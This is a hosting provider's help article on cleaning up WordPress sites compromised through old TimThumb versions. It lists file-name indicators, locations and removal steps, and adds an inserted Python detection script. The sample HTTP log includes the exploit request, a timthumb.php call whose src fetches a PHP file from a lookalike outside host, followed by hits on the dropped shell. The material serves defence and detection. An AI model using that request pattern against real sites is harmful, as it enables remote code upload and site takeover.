
WordPress Compromise: TimThumb

TimThumb is a tool used by WordPress themes and plugins to resize images. Old versions of TimThumb have a security vulnerability that lets attackers upload malicious ("bad") files from another website. The first bad file then lets the attacker upload more malicious files to the hosting account.

You can get more information about compromises and how to deal with them in What if my website is hacked?.

Signs You've Been Compromised

Besides the signs mentioned in What if my website is hacked?, you can tell your Website has been affected by this specific compromise if your account contains files with the following name patterns in a plugin directory:

    • external_[md5 hash].php — for example: external_dc8e1cb5bf0392f054e59734fa15469b.php
    • [md5 hash].php — for example: 7eebe45bde5168488ac4010f0d65cea8.php

    You can find examples of possible md5 hashes in the MD5SUMS of Known Malicious Files section of this article.

    You might also find the following files in your website's root directory:

    • x.txt
    • logx.txt

    Remedies

    You must remove all of the compromised and bad files. Before deleting anything, we recommend making a backup of your website.

    Locating Bad Files

    The bad files that are initially uploaded through the TimThumb vulnerability are typically located in one of the following subdirectories of the theme or plugin directory that contains the vulnerable timthumb.php file.

    • /tmp
    • /cache
    • /images

    Examples of bad files' locations:

    [webroot]/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/

    Examples of bad files' names in these locations:

    • ef881b33fba49bd6ad1818062d071a9c.php
    • db648d44074f33a8857066b97290d247.php
    • 3cf739debc9340540c923bbf3b73044b.php
    • dc33a2e36d3179a06278191088c2ef35.php
    • 8377cb73d30655dc2cbf906c9310da56.php
    • eb117b212e2906f52c0a0c9132c6c07a.php
    • a4924ec23939d2410354efbb8d4ddd06.php
    • vvv3.php
    • ea90e1e4d7ba30848f70b13d616c6ed4.php
    • 236268f2a06e4153365b998d13934eb9.php
    • 6a4fa516943e2fa09e3704486075de9f.php
    • 896c4eb4ff2581f6e623db1904b80a44.php
    • wp-images.php

    The files x.txt and logx.txt will contain information about when a bad file was created using the TimThumb vulnerability and the location of the bad file within the hosting account. This information is helpful in determining what files need to be removed and where to find them. However, it is not likely that this will provide a complete list of files that need to be removed.

    An example:

    Day: Thu, 11 Apr 2013 06:21:15 -0700
    IP: X.X.X.X
    Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Url: /wp-content/themes/[theme with vulnerable TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

    Files to Remove

    After you've created a backup of your Website, remove the following files:

    • x.txt
    • logx.txt
    • external_[md5 hash].php — for example: external_dc8e1cb5bf0392f054e59734fa15469b.php
    • [md5 hash].php — for example: 7eebe45bde5168488ac4010f0d65cea8.php
    • Other malicious PHP files found alongside the md5-hash-named files.

    You can do this via FTP or through the file manager within the control panel for your hosting account.

    You should also:

    • Update all of your themes and plugins to the latest version.
    • Replace any instance of timthumb.php with the newest version available from the TimThumb project.

    Technical Info

    Sample of HTTP Logs

    x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
    x.x.x.x - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
    x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
    x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
    x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
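    The two checks above, locating dropped files by the name patterns and directories listed under Locating Bad Files, and picking timthumb.php fetches with a remote src= out of the HTTP log, can be scripted. The following Python is an added example, not code from this article or the hosting provider; the theme and plugin names, the sample paths and the second log line are constructed, the first log line mirrors the article's sample, and the trusted-domain list (youtube.com) is an assumption used to show why img.youtube.com.bargainbookfinders.com is not a youtube.com host.

```python
import re
from urllib.parse import parse_qs, urlparse

# Indicators from the article: [md5].php / external_[md5].php dropped in a tmp,
# cache or images directory of a theme or plugin, plus the named files.
HASH_PHP = re.compile(r"^(external_)?[0-9a-f]{32}\.php$")
DROP_DIRS = {"tmp", "cache", "images"}
KNOWN_NAMES = {"x.txt", "logx.txt", "wp-script.php", "wp-images.php", "vvv3.php", "data.php"}
LOG_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_paths(paths):
    """Return the webroot-relative paths matching the article's file indicators."""
    hits = []
    for p in paths:
        parts = p.strip("/").split("/")
        in_ext = len(parts) > 3 and parts[0] == "wp-content" and parts[1] in ("themes", "plugins")
        if parts[-1] in KNOWN_NAMES or (
                HASH_PHP.match(parts[-1]) and in_ext and DROP_DIRS & set(parts[3:-1])):
            hits.append(p)
    return hits

def timthumb_fetches(log_lines, trusted=("youtube.com",)):
    """(request_path, src_host, trusted?) for each timthumb.php request with a remote src=."""
    out = []
    for line in log_lines:
        m = LOG_REQ.search(line)
        if not m:
            continue
        req = urlparse(m.group(1))
        if not req.path.lower().endswith("timthumb.php"):
            continue
        src = parse_qs(req.query).get("src", [""])[0]  # parse_qs percent-decodes the URL
        host = urlparse(src).hostname
        if host:
            # A genuine youtube.com host ends in ".youtube.com"; a lookalike such as
            # img.youtube.com.bargainbookfinders.com does not, whatever it starts with.
            ok = any(host == d or host.endswith("." + d) for d in trusted)
            out.append((req.path, host, ok))
    return out

# Constructed sample inputs; the first log line mirrors the article's sample.
SAMPLE_PATHS = [
    "wp-content/themes/sometheme/cache/images/896c4eb4ff2581f6e623db1904b80a44.php",
    "wp-content/plugins/someplugin/tmp/external_dc8e1cb5bf0392f054e59734fa15469b.php",
    "wp-content/themes/sometheme/functions.php", "x.txt"]
SAMPLE_LOG = [
    'x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/t/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "MSIE/4.0b1"',
    'x.x.x.x - - [27/Apr/2014:08:05:00 -0700] "GET SampleSite.tld/wp-content/themes/t/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com%2Fvi%2Fabc%2F0.jpg HTTP/1.1" 200 4000 "-" "Mozilla/5.0"']
```

    Any fetch whose src host is not under a trusted domain is worth checking against the cache directory for a freshly written hash-named .php file at the matching timestamp.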

    MD5SUMS of Known Malicious Files


    Additional Malicious Files

    • wp-script.php
    • wp-images.php
    • vvv3.php
    • data.php

    Copyright © 2005 - 2017. All rights reserved.